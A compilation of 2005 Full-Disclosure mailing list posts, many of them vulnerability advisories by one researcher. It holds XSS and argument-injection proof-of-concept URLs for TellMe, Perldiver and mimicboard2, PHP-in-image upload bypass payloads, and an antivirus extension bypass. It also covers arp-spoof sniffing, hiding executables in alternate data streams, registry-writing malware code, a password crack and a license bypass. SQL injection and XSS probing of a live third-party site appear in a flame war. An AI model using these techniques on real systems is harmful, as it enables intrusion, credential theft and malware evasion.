If you have access to a machine connected to the switch you could try arp-spoofing ( http://en.wikipedia.org/wiki/ARP_spoofing )and redirect traffic to this machine and sniff it there. More Info: http://wiki.ethereal.com/CaptureSetup/Ethernet?action=show http://su2.info/doc/arpspoof.php he might be running Windows. get cain http://oxid.it arp spoof then sniff while your routing packets cheers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacking Boot camps!
Interesting about the Intense thing... ( sory for your loss ) Blackhat training camps sound pretty good and some of the people are pretty damn skilled, but these others Zone-H, Vigilante and the likes I would avoid. blind leading the blind if you ask me. I dont know about the others, but i do know Zone-h Hands on Hacking 2 day seminars are worth it, have actual hands on hacking labs, and are quite informative. ( and dont claim to be blackhat style training, nor a CEH prep class) While not targeted for the security professional, they are an exelent way for lower level admins, developers, corporate IT, and others that are not security savy to learn about real-world attacks and mitigation. mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] another filename bypass vulnerability - fromcmd.exe
I think the OP was getting at this being an AV bypass vector for worms and other malware that can interact with cmd.exe . Theroy being that AV will scan by extention ( malware.exe vs malware.ext ) and thus evade detection but yet be executeable. In light, informal testing this appears to be a realistic scenario that provides yet another vector for AV bypass. On test systems, c:\malware.exe.txt runs the malware.exe, and does not open notepad. ( cmd.exe parses the file header, explorer.exe uses .extention ) my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FAO Mark Murtagh from Websense
And you're blantant attenpt to turn Morning Wood against me in public was just pathetic. funny... as I replied first. I suggest you back up, sit down, and stfu. kthnx, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FAO Mark Murtagh from Websense
Heres what Mark Murtagh had to say http://www.biosmagazine.co.uk/op.php?id=314\ Maybe another ten minutes of your life wasted ;-) Content Query has failed - SELECT opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp, opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion, prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime 1131846681 AND opinion.category = prod_type.id sweet! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FAO Mark Murtagh from Websense
First you missed the comment where I fixed my typo on the thread, second, I thought someone of your hacking experience, you would have been able to translate that message by yourself. In any case, I made umm, no I doubt I missed anything except your contentless dribble. but I did notice the error of the web application... not only is it vulnerable to SQL injection, it is also vuln to XSS. Possibly you would like to enroll in a Zone-H Hands on Hacking Seminar so you too might be able to understand them too, instead of filling this list with your paranoid, meglomanic rants. http://www.biosmagazine.co.uk/op.php?id=314;okbromgbrbn3td3v/b%20roxbr%20br http://www.nccgroup.com/events/index.aspx On 11/13/05, Morning Wood [EMAIL PROTECTED] wrote: Content Query has failed - SELECT opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp, opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion, prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime 1131846681 AND opinion.category = prod_type.id sweet! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about ethics when discovering a securityfault in system
Work with the company, coridinate an advisory release when they have the update avail. Chances are you will recieve some form of a credit, thanking you for finding the flaw, and brining it to the mfg's attention. cheers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well).
By prepending image headers you can often fool php/IE. This technique has been used successfully to bypass php checking and renders the php upon access. --- ÿØÿà JFIF ?php some phpcode ? --- or --- GIF87aÔ ?php some phpcode ? --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Call to participate: GNessUs security scanner
xscan from http://xfocus.org uses nessus plugins and the nasl library. I have used this tool for years, and the addition of nasl/nessus in 3.x is wonderfull. If you havent checked out this great tool, do so now. http://xfocus.org/programs/200507/18.html cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tellme 1.2
- EXPL-A-2005-015 exploitlabs.com Advisory 044 - - TellMe - AFFECTED PRODUCTS = TellMe v1.2 and earlier http://kimihia.org.nz/projects/ http://kimihia.org.nz/projects/tellme/ OVERVIEW Tellme - get all the lowdown details on an address Tellme is used to discern what a computer is running, and also to help track down servers. It combines together into one place traceroute tools, head requests, server examination, and whois lookups. TellMe is used widely in default Plesk installs as a bundled 3rd party add on. DETAILS === 1. XSS TellMe does not properly filter malicious script content. XSS my be inserted in the IP or HOSTparameter. The malicious script is then rendered and executed in the context of the users brower. 2. command option access Tellme allows access to comand line options of the whois function via: render_Open(WHOIS); if ( $q_Host ) passthru(EscapeShellCmd(whois . $q_This)); 3. information disclosure TellMe discloses path information in error output, echoing back the full path to the script. POC === 1. -- by script inclusion in the q_host parameter http://[host]/tellme/index.php?q_Host=iframe src=http://whatismyip.com/iframe 2. -- by prepending --* options to the host entry http://[host]/net/index.php?q_IP=q_Host=--version+test.como_WhoIs=on http://[host]/net/index.php?q_IP=q_Host=--help+test.como_WhoIs=on 3. - by prepending -- to the Server and HEAD options http://[host]/net/index.php?q_IP=q_Host=--+test.como_Server=ono_Head=on Warning: fsockopen(): unable to connect to --help test.com:80 in /home/httpd/vhosts/[VHOSTUSER]/httpdocs/net/index.php on line 246 SOLUTION: = vendor contact: Sept 29, 2005 [EMAIL PROTECTED] ( returned ) http://kimihia.org.nz/about/feedback/ Vendor response: Oct 4, 2005 The author has released an updated version and a diff patch, available at: Here is the new version: http://kimihia.org.nz/projects/tellme/files/tellme-1.3_php3.txt Here is a diff: http://kimihia.org.nz/projects/tellme/files/tellme-1.2-1.3.diff Here is the new README: http://kimihia.org.nz/projects/tellme/files/tellme.txt Credits === This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org orig: http://exploitlabs.com/files/advisories/EXPL-A-2005-015-tellme.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3
Can you give me an example of a trojan, worm, or another program which has added the last USB device installed in the Windows Registry, yes, see below or how about a program, worm, trojan - some ASM code... ( edited ) any_key1 db SYSTEM\CurrentControlSet\AnyKeyIWant, 0 another_key2 db SYSTEM\CurrentControlSet\AnotherKeyIWant, 0 invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL invoke wsprintf, addr senddata, addr some_value3, addr port invoke wsprintf, addr recvdata, addr another_value2, addr port invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata, eax invoke RegCloseKey, hRegkey ( repeat for another_key2 ) easily done in .c too or c:\regedt32 -s somebad.reg ( will silently install ANY key you want ) which caused something to be added to the last typed URL? VNC ( or aformentioned key writes ) how do you think malware writes startup keys? I am confused by your statement... once a system has been compromised, ANYTHING can be written to the registry ( especialy is the attacker has SYSTEM privs ) my2bits, M.W ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
been known since at least v3.2 are you using a 3.x or a 4.x series? i belive the 4.x requires an auth from core before use - Original Message - From: c0ntex [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, September 26, 2005 3:30 AM Subject: [Full-disclosure] CORE-Impact license bypass I seem to have stumbled over a bug in Core Impact licensing mechanisms that will allow anyone to continually use the Core Impact product even after the license has expired. This is not a security issue but it is, I feel, either an oversight or a feature which can be abused to utilise the Core Impact product for longer than designed / desired. In my business funded Core Impact install on this machine, the license expired at the end of last month and the usualy Your license has expired pop-up appears, however it is easy to re-enable Core to a working install by merely changing the system date on the PC to say a month before the product was due to expire. Oops ;) I guess Core is using a very simplistic license mechanism. Emailed CORE two times, 1 week ago, no reply. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: perldiver
the proposed fix is the vendors suggestion, not mine. Feel free to contact http://scriptsolutions.com/ and tell him yourself kthnx. - Original Message - From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, September 21, 2005 11:58 AM Subject: [Full-disclosure] RE: perldiver I believe mrwood's proposed fix isnt going to help. As it just strips the first character if it's \w or : perhaps when he suggested $module =~ s/^([A-Za-z0-9]|:)//g; he ment $module =~ s/[^A-Za-z0-9:]//g; Thank you morning_wood for helping promote secure web application development. Keep up the good work. Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] perldiver
- EXPL-A-2005-014 exploitlabs.com Advisory 043 - -perldiver - AFFECTED PRODUCTS = Perldiver v1.x and 2.x http://scriptsolutions.com/ OVERVIEW Perl Diver digs into your server's perl installation and giving you the information you need and quick and easy to find manner. DETAILS === 1. XSS Perldiver does not properly filter malicious script content. XSS my be inserted in the module parameter. ( v2.x ) or as a GET request in the main script ( v1.x ) The malicious script is the rendered and is executed in the context of the users brower. POC === 1.x -- http://[host]/[path]/perldiver.pl?testhereSCRIPTalert(document.domain);/SCRIPT 2.x -- http://[host]/[path]/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script bonus vendor site vuln: http://www.scriptsolutions.com/programs/free/perldiver/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script SOLUTION: = vendor contact: Sept 14, 2005 http://www.scriptsolutions.com/support/postlist.pl?Cat=Board=DDBugs response Sept 15, 2005 If you are a current PerlDiver user, you can either download the updated version, or insert the following line after my $module = param( 'module' ); in the module_detail subroutine: $module =~ s/^([A-Za-z0-9]|:)//g; updated version: http://www.scriptsolutions.com/support/showflat.pl?Board=DLPerlDiverNumber=446 http://www.scriptsolutions.com/support/files/4-446-perldiver.zip Credits === This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org orig advisory: http://exploitlabs.com/files/advisories/EXPL-A-2005-014-perldiver.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] mimicboard2
- EXPL-A-2005-013 exploitlabs.com Advisory 042 - - mimicboard2 - AFFECTED PRODUCTS mimicboard2 #086 and lower http://www.chitta.com/nobu/download/#mimic2 OVERVIEW Mimic2 is a html open forum type of blog, tailored in particular to the Japaneese market ( and is very popular ) DETAILS 1. XSS Mimic2 does not properly filter malicious script content. XSS my be inserted in the name, title and comment sections, and is persistant in nature. The malicious script is the rendered upon visitation and is executed in the context of the users brower. 2. information disclosure http://[host]/mimic2.dat is viewable via the webroot and has no protection by default. mimic2 stores data in this file consisting of: a. administrator passwords b. user information including refer ip address, message content and password if one was used in the post. POC 1. input malicious iframe script into the comment, title and name sections. http://[host]/mimic2.cgi eg:iframe src=[attacker url]/iframe 2. the password(s) are easily crackable as evidenced by: mimic2.dat echo mimic board2:Fdtr67zbisXVA:13 mimic2.txt john -w:password.lst mimic2.txt Loaded 1 password (Standard DES [24/32 4K]) password (mimic board2) SOLUTION: vendor contact: [EMAIL PROTECTED] Aug 24, 2005 no response as of Sept 8, 2005 Credits This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org web: http://exploitlabs.com web: http://zone-h.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Shell32.dll.124.config
sounds like an ADS ( alternate data stream ) http://www.sysinternals.com/Utilities/Streams.html I wrote this awhile back as notes on a project... this is a simple example... Create an executable ADS: - c:\type c:\fullpath\exename.exe somefile.ext:exename.exe ( or somefile.exe:someothername.exe ) Execute an ADS: --- c:\start c:\pathto\somefile.ext ( starts the example above running exename.exe behind the visible somefile.ext ) c:\type c:\start.bat c:\windows\explorer.exe:start.bat ( this creates a file named start.bat that executes explorer.exe ) c:\start ( will now execute the full path to c:\to\somefile.ext ) hope this helps. - Original Message - From: y0himba [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, September 05, 2005 4:33 PM Subject: [Full-disclosure] Shell32.dll.124.config Hi, Yes I am a noob. I have a question though. Google searches and a few other things can tell me nothing about shell32.dll.124.config. I am on WindowsXP SP2, and keep seeing this file show up in antivirus scans, but cannot find it anywhere on the system! I think it is dynamically created by something, but after sitting and watching Filemon 7.02 for 20 minutes or so, I give up. Has anyone heard of this file? Antivir, Bitdefender, AVG and Clam all show it on the system, have scanned it, but have found nothing. I have never seen this file before... Thanks in advance for your help! -BEGIN GEEK CODE BLOCK- Version: 3.1 GCM/GIT/GO d- s: a C$ UL P L E W N+ o K++ w O- M- V-- PS+ PE Y++ PGP++ t+ 5-- X+ R* tv++ b+ DI++ D G++ e h r+++ y --END GEEK CODE BLOCK-- Get Your Geek Code: http://www.geekcode.com -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.344 / Virus Database: 267.10.18/90 - Release Date: 9/5/2005 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/